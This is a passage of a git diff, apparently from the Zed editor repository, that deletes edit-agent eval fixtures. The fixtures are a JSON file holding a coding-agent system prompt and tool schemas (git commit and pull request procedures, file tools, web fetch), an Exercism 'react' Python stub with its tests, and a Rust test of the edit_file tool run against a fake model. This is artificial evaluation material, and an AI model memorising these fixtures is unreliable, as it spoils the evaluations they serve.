specify an optional timeout in milliseconds (up to 600000ms / 10 minutes). 
If not specified, commands will timeout after 30 minutes.\n - It is very helpful if you write a clear, concise description of what this command does in 5-10 words.\n - If the output exceeds 30000 characters, output will be truncated before being returned to you.\n - VERY IMPORTANT: You MUST avoid using search commands like `find` and `grep`. Instead use GrepTool, GlobTool, or dispatch_agent to search. You MUST avoid read tools like `cat`, `head`, `tail`, and `ls`, and use View and LS to read files.\n - When issuing multiple commands, use the ';' or '&&' operator to separate them. DO NOT use newlines (newlines are ok in quoted strings).\n - Try to maintain your current working directory throughout the session by using absolute paths and avoiding usage of `cd`. You may use `cd` if the User explicitly requests it.\n \n pytest /foo/bar/tests\n \n \n cd /foo/bar && pytest tests\n \n\n# Committing changes with git\n\nWhen the user asks you to create a new git commit, follow these steps carefully:\n\n1. Use BatchTool to run the following commands in parallel:\n - Run a git status command to see all untracked files.\n - Run a git diff command to see both staged and unstaged changes that will be committed.\n - Run a git log command to see recent commit messages, so that you can follow this repository's commit message style.\n\n2. Analyze all staged changes (both previously staged and newly added) and draft a commit message. Wrap your analysis process in tags:\n\n\n- List the files that have been changed or added\n- Summarize the nature of the changes (eg. 
new feature, enhancement to an existing feature, bug fix, refactoring, test, docs, etc.)\n- Brainstorm the purpose or motivation behind these changes\n- Assess the impact of these changes on the overall project\n- Check for any sensitive information that shouldn't be committed\n- Draft a concise (1-2 sentences) commit message that focuses on the \"why\" rather than the \"what\"\n- Ensure your language is clear, concise, and to the point\n- Ensure the message accurately reflects the changes and their purpose (i.e. \"add\" means a wholly new feature, \"update\" means an enhancement to an existing feature, \"fix\" means a bug fix, etc.)\n- Ensure the message is not generic (avoid words like \"Update\" or \"Fix\" without context)\n- Review the draft message to ensure it accurately reflects the changes and their purpose\n\n\n3. Use BatchTool to run the following commands in parallel:\n - Add relevant untracked files to the staging area.\n - Create the commit with a message ending with:\n 🤖 Generated with [Claude Code](https://claude.ai/code)\n\n Co-Authored-By: Claude \n - Run git status to make sure the commit succeeded.\n\n4. If the commit fails due to pre-commit hook changes, retry the commit ONCE to include these automated changes. If it fails again, it usually means a pre-commit hook is preventing the commit. If the commit succeeds but you notice that files were modified by the pre-commit hook, you MUST amend your commit to include them.\n\nImportant notes:\n- Use the git context at the start of this conversation to determine which files are relevant to your commit. Be careful not to stage and commit files (e.g. 
with `git add .`) that aren't relevant to your commit.\n- NEVER update the git config\n- DO NOT run additional commands to read or explore code, beyond what is available in the git context\n- DO NOT push to the remote repository\n- IMPORTANT: Never use git commands with the -i flag (like git rebase -i or git add -i) since they require interactive input which is not supported.\n- If there are no changes to commit (i.e., no untracked files and no modifications), do not create an empty commit\n- Ensure your commit message is meaningful and concise. It should explain the purpose of the changes, not just describe them.\n- Return an empty response - the user will see the git output directly\n- In order to ensure good formatting, ALWAYS pass the commit message via a HEREDOC, a la this example:\n\ngit commit -m \"$(cat <<'EOF'\n Commit message here.\n\n 🤖 Generated with [Claude Code](https://claude.ai/code)\n\n Co-Authored-By: Claude \n EOF\n )\"\n\n\n# Creating pull requests\nUse the gh command via the Bash tool for ALL GitHub-related tasks including working with issues, pull requests, checks, and releases. If given a Github URL use the gh command to get the information needed.\n\nIMPORTANT: When the user asks you to create a pull request, follow these steps carefully:\n\n1. Use BatchTool to run the following commands in parallel, in order to understand the current state of the branch since it diverged from the main branch:\n - Run a git status command to see all untracked files\n - Run a git diff command to see both staged and unstaged changes that will be committed\n - Check if the current branch tracks a remote branch and is up to date with the remote, so you know if you need to push to the remote\n - Run a git log command and `git diff main...HEAD` to understand the full commit history for the current branch (from the time it diverged from the `main` branch)\n\n2. 
Analyze all changes that will be included in the pull request, making sure to look at all relevant commits (NOT just the latest commit, but ALL commits that will be included in the pull request!!!), and draft a pull request summary. Wrap your analysis process in tags:\n\n\n- List the commits since diverging from the main branch\n- Summarize the nature of the changes (eg. new feature, enhancement to an existing feature, bug fix, refactoring, test, docs, etc.)\n- Brainstorm the purpose or motivation behind these changes\n- Assess the impact of these changes on the overall project\n- Do not use tools to explore code, beyond what is available in the git context\n- Check for any sensitive information that shouldn't be committed\n- Draft a concise (1-2 bullet points) pull request summary that focuses on the \"why\" rather than the \"what\"\n- Ensure the summary accurately reflects all changes since diverging from the main branch\n- Ensure your language is clear, concise, and to the point\n- Ensure the summary accurately reflects the changes and their purpose (ie. \"add\" means a wholly new feature, \"update\" means an enhancement to an existing feature, \"fix\" means a bug fix, etc.)\n- Ensure the summary is not generic (avoid words like \"Update\" or \"Fix\" without context)\n- Review the draft summary to ensure it accurately reflects the changes and their purpose\n\n\n3. Use BatchTool to run the following commands in parallel:\n - Create new branch if needed\n - Push to remote with -u flag if needed\n - Create PR using gh pr create with the format below. 
Use a HEREDOC to pass the body to ensure correct formatting.\n\ngh pr create --title \"the pr title\" --body \"$(cat <<'EOF'\n## Summary\n<1-3 bullet points>\n\n## Test plan\n[Checklist of TODOs for testing the pull request...]\n\n🤖 Generated with [Claude Code](https://claude.ai/code)\nEOF\n)\"\n\n\nImportant:\n- NEVER update the git config\n- Return an empty response - the user will see the gh output directly\n\n# Other common operations\n- View comments on a Github PR: gh api repos/foo/bar/pulls/123/comments\n---Tool: GlobTool\nArguments: pattern: string \"The glob pattern to match files against\", [optional] path: string \"The directory to search in. If not specified, the current working directory will be used. IMPORTANT: Omit this field to use the default directory. DO NOT enter \"undefined\" or \"null\" - simply omit it for the default behavior. Must be a valid directory path if provided.\"\nUsage: - Fast file pattern matching tool that works with any codebase size\n- Supports glob patterns like \"**/*.js\" or \"src/**/*.ts\"\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files by name patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n\n---Tool: GrepTool\nArguments: pattern: string \"The regular expression pattern to search for in file contents\", [optional] path: string \"The directory to search in. Defaults to the current working directory.\", [optional] include: string \"File pattern to include in the search (e.g. \"*.js\", \"*.{ts,tsx}\")\"\nUsage: \n- Fast content search tool that works with any codebase size\n- Searches file contents using regular expressions\n- Supports full regex syntax (eg. \"log.*Error\", \"function\\s+\\w+\", etc.)\n- Filter files by pattern with the include parameter (eg. 
\"*.js\", \"*.{ts,tsx}\")\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files containing specific patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n\n---Tool: LS\nArguments: path: string \"The absolute path to the directory to list (must be absolute, not relative)\", [optional] ignore: array \"List of glob patterns to ignore\"\nUsage: Lists files and directories in a given path. The path parameter must be an absolute path, not a relative path. You can optionally provide an array of glob patterns to ignore with the ignore parameter. You should generally prefer the Glob and Grep tools, if you know which directories to search.\n---Tool: View\nArguments: file_path: string \"The absolute path to the file to read\", [optional] offset: number \"The line number to start reading from. Only provide if the file is too large to read at once\", [optional] limit: number \"The number of lines to read. Only provide if the file is too large to read at once.\"\nUsage: Reads a file from the local filesystem. You can access any file directly by using this tool.\nAssume this tool is able to read all files on the machine. If the User provides a path to a file assume that path is valid. It is okay to read a file that does not exist; an error will be returned.\n\nUsage:\n- The file_path parameter must be an absolute path, not a relative path\n- By default, it reads up to 2000 lines starting from the beginning of the file\n- You can optionally specify a line offset and limit (especially handy for long files), but it's recommended to read the whole file by not providing these parameters\n- Any lines longer than 2000 characters will be truncated\n- Results are returned using cat -n format, with line numbers starting at 1\n- This tool allows Claude Code to VIEW images (eg PNG, JPG, etc). 
When reading an image file the contents are presented visually as Claude Code is a multimodal LLM.\n- For Jupyter notebooks (.ipynb files), use the ReadNotebook instead\n- When reading multiple files, you MUST use the BatchTool tool to read them all at once\n---Tool: Edit\nArguments: file_path: string \"The absolute path to the file to modify\", old_string: string \"The text to replace\", new_string: string \"The text to replace it with\", [optional] expected_replacements: number \"The expected number of replacements to perform. Defaults to 1 if not specified.\"\nUsage: This is a tool for editing files. For moving or renaming files, you should generally use the Bash tool with the 'mv' command instead. For larger edits, use the Write tool to overwrite files. For Jupyter notebooks (.ipynb files), use the NotebookEditCell instead.\n\nBefore using this tool:\n\n1. Use the View tool to understand the file's contents and context\n\n2. Verify the directory path is correct (only applicable when creating new files):\n - Use the LS tool to verify the parent directory exists and is the correct location\n\nTo make a file edit, provide the following:\n1. file_path: The absolute path to the file to modify (must be absolute, not relative)\n2. old_string: The text to replace (must match the file contents exactly, including all whitespace and indentation)\n3. new_string: The edited text to replace the old_string\n4. expected_replacements: The number of replacements you expect to make. Defaults to 1 if not specified.\n\nBy default, the tool will replace ONE occurrence of old_string with new_string in the specified file. If you want to replace multiple occurrences, provide the expected_replacements parameter with the exact number of occurrences you expect.\n\nCRITICAL REQUIREMENTS FOR USING THIS TOOL:\n\n1. UNIQUENESS (when expected_replacements is not specified): The old_string MUST uniquely identify the specific instance you want to change. 
This means:\n - Include AT LEAST 3-5 lines of context BEFORE the change point\n - Include AT LEAST 3-5 lines of context AFTER the change point\n - Include all whitespace, indentation, and surrounding code exactly as it appears in the file\n\n2. EXPECTED MATCHES: If you want to replace multiple instances:\n - Use the expected_replacements parameter with the exact number of occurrences you expect to replace\n - This will replace ALL occurrences of the old_string with the new_string\n - If the actual number of matches doesn't equal expected_replacements, the edit will fail\n - This is a safety feature to prevent unintended replacements\n\n3. VERIFICATION: Before using this tool:\n - Check how many instances of the target text exist in the file\n - If multiple instances exist, either:\n a) Gather enough context to uniquely identify each one and make separate calls, OR\n b) Use expected_replacements parameter with the exact count of instances you expect to replace\n\nWARNING: If you do not follow these requirements:\n - The tool will fail if old_string matches multiple locations and expected_replacements isn't specified\n - The tool will fail if the number of matches doesn't equal expected_replacements when it's specified\n - The tool will fail if old_string doesn't match exactly (including whitespace)\n - You may change unintended instances if you don't verify the match count\n\nWhen making edits:\n - Ensure the edit results in idiomatic, correct code\n - Do not leave the code in a broken state\n - Always use absolute file paths (starting with /)\n\nIf you want to create a new file, use:\n - A new file path, including dir name if needed\n - An empty old_string\n - The new file's contents as new_string\n\nRemember: when making multiple file edits in a row to the same file, you should prefer to send all edits in a single message with multiple calls to this tool, rather than multiple messages with a single call each.\n\n---Tool: Replace\nArguments: file_path: string \"The 
absolute path to the file to write (must be absolute, not relative)\", content: string \"The content to write to the file\"\nUsage: Write a file to the local filesystem. Overwrites the existing file if there is one.\n\nBefore using this tool:\n\n1. Use the ReadFile tool to understand the file's contents and context\n\n2. Directory Verification (only applicable when creating new files):\n - Use the LS tool to verify the parent directory exists and is the correct location\n---Tool: ReadNotebook\nArguments: notebook_path: string \"The absolute path to the Jupyter notebook file to read (must be absolute, not relative)\"\nUsage: Reads a Jupyter notebook (.ipynb file) and returns all of the cells with their outputs. Jupyter notebooks are interactive documents that combine code, text, and visualizations, commonly used for data analysis and scientific computing. The notebook_path parameter must be an absolute path, not a relative path.\n---Tool: NotebookEditCell\nArguments: notebook_path: string \"The absolute path to the Jupyter notebook file to edit (must be absolute, not relative)\", cell_number: number \"The index of the cell to edit (0-based)\", new_source: string \"The new source for the cell\", [optional] cell_type: string \"The type of the cell (code or markdown). If not specified, it defaults to the current cell type. If using edit_mode=insert, this is required.\", [optional] edit_mode: string \"The type of edit to make (replace, insert, delete). Defaults to replace.\"\nUsage: Completely replaces the contents of a specific cell in a Jupyter notebook (.ipynb file) with new source. Jupyter notebooks are interactive documents that combine code, text, and visualizations, commonly used for data analysis and scientific computing. The notebook_path parameter must be an absolute path, not a relative path. The cell_number is 0-indexed. Use edit_mode=insert to add a new cell at the index specified by cell_number. 
Use edit_mode=delete to delete the cell at the index specified by cell_number.\n---Tool: WebFetchTool\nArguments: url: string \"The URL to fetch content from\", prompt: string \"The prompt to run on the fetched content\"\nUsage: \n- Fetches content from a specified URL and processes it using an AI model\n- Takes a URL and a prompt as input\n- Fetches the URL content, converts HTML to markdown\n- Processes the content with the prompt using a small, fast model\n- Returns the model's response about the content\n- Use this tool when you need to retrieve and analyze web content\n\nUsage notes:\n - IMPORTANT: If an MCP-provided web fetch tool is available, prefer using that tool instead of this one, as it may have fewer restrictions. All MCP-provided tools start with \"mcp__\".\n - The URL must be a fully-formed valid URL\n - HTTP URLs will be automatically upgraded to HTTPS\n - For security reasons, the URL's domain must have been provided directly by the user, unless it's on a small pre-approved set of the top few dozen hosts for popular coding resources, like react.dev.\n - The prompt should describe what information you want to extract from the page\n - This tool is read-only and does not modify any files\n - Results may be summarized if the content is very large\n - Includes a self-cleaning 15-minute cache for faster responses when repeatedly accessing the same URL\n\n\nExample usage:\n{\n \"invocations\": [\n {\n \"tool_name\": \"Bash\",\n \"input\": {\n \"command\": \"git blame src/foo.ts\"\n }\n },\n {\n \"tool_name\": \"GlobTool\",\n \"input\": {\n \"pattern\": \"**/*.ts\"\n }\n },\n {\n \"tool_name\": \"GrepTool\",\n \"input\": {\n \"pattern\": \"function\",\n \"include\": \"*.ts\"\n }\n }\n ]\n}\n", - "inputSchema": { - "type": "object", - "properties": { - "description": { - "type": "string", - "description": "A short (3-5 word) description of the batch operation" - }, - "invocations": { - "type": "array", - "items": { - "type": "object", - "properties": { - 
"tool_name": { - "type": "string", - "description": "The name of the tool to invoke" - }, - "input": { - "type": "object", - "additionalProperties": {}, - "description": "The input to pass to the tool" - } - }, - "required": [ - "tool_name", - "input" - ], - "additionalProperties": false - }, - "description": "The list of tool invocations to execute" - } - }, - "required": [ - "description", - "invocations" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "GlobTool", - "description": "- Fast file pattern matching tool that works with any codebase size\n- Supports glob patterns like \"**/*.js\" or \"src/**/*.ts\"\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files by name patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n", - "inputSchema": { - "type": "object", - "properties": { - "pattern": { - "type": "string", - "description": "The glob pattern to match files against" - }, - "path": { - "type": "string", - "description": "The directory to search in. If not specified, the current working directory will be used. IMPORTANT: Omit this field to use the default directory. DO NOT enter \"undefined\" or \"null\" - simply omit it for the default behavior. Must be a valid directory path if provided." - } - }, - "required": [ - "pattern" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "GrepTool", - "description": "\n- Fast content search tool that works with any codebase size\n- Searches file contents using regular expressions\n- Supports full regex syntax (eg. \"log.*Error\", \"function\\s+\\w+\", etc.)\n- Filter files by pattern with the include parameter (eg. 
\"*.js\", \"*.{ts,tsx}\")\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files containing specific patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n", - "inputSchema": { - "type": "object", - "properties": { - "pattern": { - "type": "string", - "description": "The regular expression pattern to search for in file contents" - }, - "path": { - "type": "string", - "description": "The directory to search in. Defaults to the current working directory." - }, - "include": { - "type": "string", - "description": "File pattern to include in the search (e.g. \"*.js\", \"*.{ts,tsx}\")" - } - }, - "required": [ - "pattern" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "LS", - "description": "Lists files and directories in a given path. The path parameter must be an absolute path, not a relative path. You can optionally provide an array of glob patterns to ignore with the ignore parameter. You should generally prefer the Glob and Grep tools, if you know which directories to search.", - "inputSchema": { - "type": "object", - "properties": { - "path": { - "type": "string", - "description": "The absolute path to the directory to list (must be absolute, not relative)" - }, - "ignore": { - "type": "array", - "items": { - "type": "string" - }, - "description": "List of glob patterns to ignore" - } - }, - "required": [ - "path" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "View", - "description": "Read a file from the local filesystem.", - "inputSchema": { - "type": "object", - "properties": { - "file_path": { - "type": "string", - "description": "The absolute path to the file to read" - }, - "offset": { - "type": "number", - "description": "The line number to start reading from. 
Only provide if the file is too large to read at once" - }, - "limit": { - "type": "number", - "description": "The number of lines to read. Only provide if the file is too large to read at once." - } - }, - "required": [ - "file_path" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "Edit", - "description": "A tool for editing files", - "inputSchema": { - "type": "object", - "properties": { - "file_path": { - "type": "string", - "description": "The absolute path to the file to modify" - }, - "old_string": { - "type": "string", - "description": "The text to replace" - }, - "new_string": { - "type": "string", - "description": "The text to replace it with" - }, - "expected_replacements": { - "type": "number", - "default": 1, - "description": "The expected number of replacements to perform. Defaults to 1 if not specified." - } - }, - "required": [ - "file_path", - "old_string", - "new_string" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "Replace", - "description": "Write a file to the local filesystem.", - "inputSchema": { - "type": "object", - "properties": { - "file_path": { - "type": "string", - "description": "The absolute path to the file to write (must be absolute, not relative)" - }, - "content": { - "type": "string", - "description": "The content to write to the file" - } - }, - "required": [ - "file_path", - "content" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "ReadNotebook", - "description": "Extract and read source code from all code cells in a Jupyter notebook.", - "inputSchema": { - "type": "object", - "properties": { - "notebook_path": { - "type": "string", - "description": "The absolute path to the Jupyter notebook file to read (must be absolute, not relative)" - } - }, - "required": [ - "notebook_path" - ], - "additionalProperties": false, - 
"$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "NotebookEditCell", - "description": "Replace the contents of a specific cell in a Jupyter notebook.", - "inputSchema": { - "type": "object", - "properties": { - "notebook_path": { - "type": "string", - "description": "The absolute path to the Jupyter notebook file to edit (must be absolute, not relative)" - }, - "cell_number": { - "type": "number", - "description": "The index of the cell to edit (0-based)" - }, - "new_source": { - "type": "string", - "description": "The new source for the cell" - }, - "cell_type": { - "type": "string", - "enum": [ - "code", - "markdown" - ], - "description": "The type of the cell (code or markdown). If not specified, it defaults to the current cell type. If using edit_mode=insert, this is required." - }, - "edit_mode": { - "type": "string", - "description": "The type of edit to make (replace, insert, delete). Defaults to replace." - } - }, - "required": [ - "notebook_path", - "cell_number", - "new_source" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "WebFetchTool", - "description": "Claude wants to fetch content from this URL", - "inputSchema": { - "type": "object", - "properties": { - "url": { - "type": "string", - "format": "uri", - "description": "The URL to fetch content from" - }, - "prompt": { - "type": "string", - "description": "The prompt to run on the fetched content" - } - }, - "required": [ - "url", - "prompt" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - } - ] - } -} -``` diff --git a/crates/agent/src/edit_agent/evals/fixtures/zode/react.py b/crates/agent/src/edit_agent/evals/fixtures/zode/react.py deleted file mode 100644 index 03ff02e7891449..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/zode/react.py +++ /dev/null @@ -1,14 +0,0 @@ -class InputCell: - def __init__(self, initial_value): - self.value = 
None - - -class ComputeCell: - def __init__(self, inputs, compute_function): - self.value = None - - def add_callback(self, callback): - pass - - def remove_callback(self, callback): - pass diff --git a/crates/agent/src/edit_agent/evals/fixtures/zode/react_test.py b/crates/agent/src/edit_agent/evals/fixtures/zode/react_test.py deleted file mode 100644 index 1f917e40b4167e..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/zode/react_test.py +++ /dev/null @@ -1,271 +0,0 @@ -# These tests are auto-generated with test data from: -# https://github.com/exercism/problem-specifications/tree/main/exercises/react/canonical-data.json -# File last updated on 2023-07-19 - -from functools import partial -import unittest - -from react import ( - InputCell, - ComputeCell, -) - - -class ReactTest(unittest.TestCase): - def test_input_cells_have_a_value(self): - input = InputCell(10) - self.assertEqual(input.value, 10) - - def test_an_input_cell_s_value_can_be_set(self): - input = InputCell(4) - input.value = 20 - self.assertEqual(input.value, 20) - - def test_compute_cells_calculate_initial_value(self): - input = InputCell(1) - output = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - self.assertEqual(output.value, 2) - - def test_compute_cells_take_inputs_in_the_right_order(self): - one = InputCell(1) - two = InputCell(2) - output = ComputeCell( - [ - one, - two, - ], - lambda inputs: inputs[0] + inputs[1] * 10, - ) - self.assertEqual(output.value, 21) - - def test_compute_cells_update_value_when_dependencies_are_changed(self): - input = InputCell(1) - output = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - input.value = 3 - self.assertEqual(output.value, 4) - - def test_compute_cells_can_depend_on_other_compute_cells(self): - input = InputCell(1) - times_two = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] * 2, - ) - times_thirty = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] * 30, - ) - output = 
ComputeCell( - [ - times_two, - times_thirty, - ], - lambda inputs: inputs[0] + inputs[1], - ) - self.assertEqual(output.value, 32) - input.value = 3 - self.assertEqual(output.value, 96) - - def test_compute_cells_fire_callbacks(self): - input = InputCell(1) - output = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - cb1_observer = [] - callback1 = self.callback_factory(cb1_observer) - output.add_callback(callback1) - input.value = 3 - self.assertEqual(cb1_observer[-1], 4) - - def test_callback_cells_only_fire_on_change(self): - input = InputCell(1) - output = ComputeCell([input], lambda inputs: 111 if inputs[0] < 3 else 222) - cb1_observer = [] - callback1 = self.callback_factory(cb1_observer) - output.add_callback(callback1) - input.value = 2 - self.assertEqual(cb1_observer, []) - input.value = 4 - self.assertEqual(cb1_observer[-1], 222) - - def test_callbacks_do_not_report_already_reported_values(self): - input = InputCell(1) - output = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - cb1_observer = [] - callback1 = self.callback_factory(cb1_observer) - output.add_callback(callback1) - input.value = 2 - self.assertEqual(cb1_observer[-1], 3) - input.value = 3 - self.assertEqual(cb1_observer[-1], 4) - - def test_callbacks_can_fire_from_multiple_cells(self): - input = InputCell(1) - plus_one = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - minus_one = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] - 1, - ) - cb1_observer = [] - cb2_observer = [] - callback1 = self.callback_factory(cb1_observer) - callback2 = self.callback_factory(cb2_observer) - plus_one.add_callback(callback1) - minus_one.add_callback(callback2) - input.value = 10 - self.assertEqual(cb1_observer[-1], 11) - self.assertEqual(cb2_observer[-1], 9) - - def test_callbacks_can_be_added_and_removed(self): - input = InputCell(11) - output = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - cb1_observer = [] - 
cb2_observer = [] - cb3_observer = [] - callback1 = self.callback_factory(cb1_observer) - callback2 = self.callback_factory(cb2_observer) - callback3 = self.callback_factory(cb3_observer) - output.add_callback(callback1) - output.add_callback(callback2) - input.value = 31 - self.assertEqual(cb1_observer[-1], 32) - self.assertEqual(cb2_observer[-1], 32) - output.remove_callback(callback1) - output.add_callback(callback3) - input.value = 41 - self.assertEqual(len(cb1_observer), 1) - self.assertEqual(cb2_observer[-1], 42) - self.assertEqual(cb3_observer[-1], 42) - - def test_removing_a_callback_multiple_times_doesn_t_interfere_with_other_callbacks( - self, - ): - input = InputCell(1) - output = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - cb1_observer = [] - cb2_observer = [] - callback1 = self.callback_factory(cb1_observer) - callback2 = self.callback_factory(cb2_observer) - output.add_callback(callback1) - output.add_callback(callback2) - output.remove_callback(callback1) - output.remove_callback(callback1) - output.remove_callback(callback1) - input.value = 2 - self.assertEqual(cb1_observer, []) - self.assertEqual(cb2_observer[-1], 3) - - def test_callbacks_should_only_be_called_once_even_if_multiple_dependencies_change( - self, - ): - input = InputCell(1) - plus_one = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - minus_one1 = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] - 1, - ) - minus_one2 = ComputeCell( - [ - minus_one1, - ], - lambda inputs: inputs[0] - 1, - ) - output = ComputeCell( - [ - plus_one, - minus_one2, - ], - lambda inputs: inputs[0] * inputs[1], - ) - cb1_observer = [] - callback1 = self.callback_factory(cb1_observer) - output.add_callback(callback1) - input.value = 4 - self.assertEqual(cb1_observer[-1], 10) - - def test_callbacks_should_not_be_called_if_dependencies_change_but_output_value_doesn_t_change( - self, - ): - input = InputCell(1) - plus_one = ComputeCell( - [ - input, - ], - 
lambda inputs: inputs[0] + 1, - ) - minus_one = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] - 1, - ) - always_two = ComputeCell( - [ - plus_one, - minus_one, - ], - lambda inputs: inputs[0] - inputs[1], - ) - cb1_observer = [] - callback1 = self.callback_factory(cb1_observer) - always_two.add_callback(callback1) - input.value = 2 - self.assertEqual(cb1_observer, []) - input.value = 3 - self.assertEqual(cb1_observer, []) - input.value = 4 - self.assertEqual(cb1_observer, []) - input.value = 5 - self.assertEqual(cb1_observer, []) - - # Utility functions. - def callback_factory(self, observer): - def callback(observer, value): - observer.append(value) - - return partial(callback, observer) diff --git a/crates/agent/src/tests/edit_file_thread_test.rs b/crates/agent/src/tests/edit_file_thread_test.rs deleted file mode 100644 index 7e6d131c98fca2..00000000000000 --- a/crates/agent/src/tests/edit_file_thread_test.rs +++ /dev/null @@ -1,407 +0,0 @@ -use super::*; -use crate::{AgentTool, EditFileTool, ReadFileTool}; -use acp_thread::UserMessageId; -use fs::FakeFs; -use language_model::{ - LanguageModelCompletionEvent, LanguageModelToolUse, StopReason, - fake_provider::FakeLanguageModel, -}; -use prompt_store::ProjectContext; -use serde_json::json; -use std::{sync::Arc, time::Duration}; -use util::path; - -#[gpui::test] -async fn test_edit_file_tool_in_thread_context(cx: &mut TestAppContext) { - // This test verifies that the edit_file tool works correctly when invoked - // through the full thread flow (model sends ToolUse event -> tool runs -> result sent back). - // This is different from tests that call tool.run() directly. 
- super::init_test(cx); - super::always_allow_tools(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/project"), - json!({ - "src": { - "main.rs": "fn main() {\n println!(\"Hello, world!\");\n}\n" - } - }), - ) - .await; - - let project = project::Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let project_context = cx.new(|_cx| ProjectContext::default()); - let context_server_store = project.read_with(cx, |project, _| project.context_server_store()); - let context_server_registry = - cx.new(|cx| crate::ContextServerRegistry::new(context_server_store.clone(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let fake_model = model.as_fake(); - - let thread = cx.new(|cx| { - let mut thread = crate::Thread::new( - project.clone(), - project_context, - context_server_registry, - crate::Templates::new(), - Some(model.clone()), - cx, - ); - // Add just the tools we need for this test - let language_registry = project.read(cx).languages().clone(); - thread.add_tool(crate::ReadFileTool::new( - project.clone(), - thread.action_log().clone(), - true, - )); - thread.add_tool(crate::EditFileTool::new( - project.clone(), - cx.weak_entity(), - language_registry, - crate::Templates::new(), - )); - thread - }); - - // First, read the file so the thread knows about its contents - let _events = thread - .update(cx, |thread, cx| { - thread.send(UserMessageId::new(), ["Read the file src/main.rs"], cx) - }) - .unwrap(); - cx.run_until_parked(); - - // Model calls read_file tool - let read_tool_use = LanguageModelToolUse { - id: "read_tool_1".into(), - name: ReadFileTool::NAME.into(), - raw_input: json!({"path": "project/src/main.rs"}).to_string(), - input: json!({"path": "project/src/main.rs"}), - is_input_complete: true, - thought_signature: None, - }; - fake_model - .send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(read_tool_use)); - fake_model - 
.send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); - fake_model.end_last_completion_stream(); - cx.run_until_parked(); - - // Wait for the read tool to complete and model to be called again - while fake_model.pending_completions().is_empty() { - cx.run_until_parked(); - } - - // Model responds after seeing the file content, then calls edit_file - fake_model.send_last_completion_stream_text_chunk("I'll edit the file now."); - let edit_tool_use = LanguageModelToolUse { - id: "edit_tool_1".into(), - name: EditFileTool::NAME.into(), - raw_input: json!({ - "display_description": "Change greeting message", - "path": "project/src/main.rs", - "mode": "edit" - }) - .to_string(), - input: json!({ - "display_description": "Change greeting message", - "path": "project/src/main.rs", - "mode": "edit" - }), - is_input_complete: true, - thought_signature: None, - }; - fake_model - .send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(edit_tool_use)); - fake_model - .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); - fake_model.end_last_completion_stream(); - cx.run_until_parked(); - - // The edit_file tool creates an EditAgent which makes its own model request. - // We need to respond to that request with the edit instructions. - // Wait for the edit agent's completion request - let deadline = std::time::Instant::now() + Duration::from_secs(5); - while fake_model.pending_completions().is_empty() { - if std::time::Instant::now() >= deadline { - panic!( - "Timed out waiting for edit agent completion request. 
Pending: {}", - fake_model.pending_completions().len() - ); - } - cx.run_until_parked(); - cx.background_executor - .timer(Duration::from_millis(10)) - .await; - } - - // Send the edit agent's response with the XML format it expects - let edit_response = "println!(\"Hello, world!\");\nprintln!(\"Hello, Zed!\");"; - fake_model.send_last_completion_stream_text_chunk(edit_response); - fake_model.end_last_completion_stream(); - cx.run_until_parked(); - - // Wait for the edit to complete and the thread to call the model again with tool results - let deadline = std::time::Instant::now() + Duration::from_secs(5); - while fake_model.pending_completions().is_empty() { - if std::time::Instant::now() >= deadline { - panic!("Timed out waiting for model to be called after edit completion"); - } - cx.run_until_parked(); - cx.background_executor - .timer(Duration::from_millis(10)) - .await; - } - - // Verify the file was edited - let file_content = fs - .load(path!("/project/src/main.rs").as_ref()) - .await - .expect("file should exist"); - assert!( - file_content.contains("Hello, Zed!"), - "File should have been edited. Content: {}", - file_content - ); - assert!( - !file_content.contains("Hello, world!"), - "Old content should be replaced. 
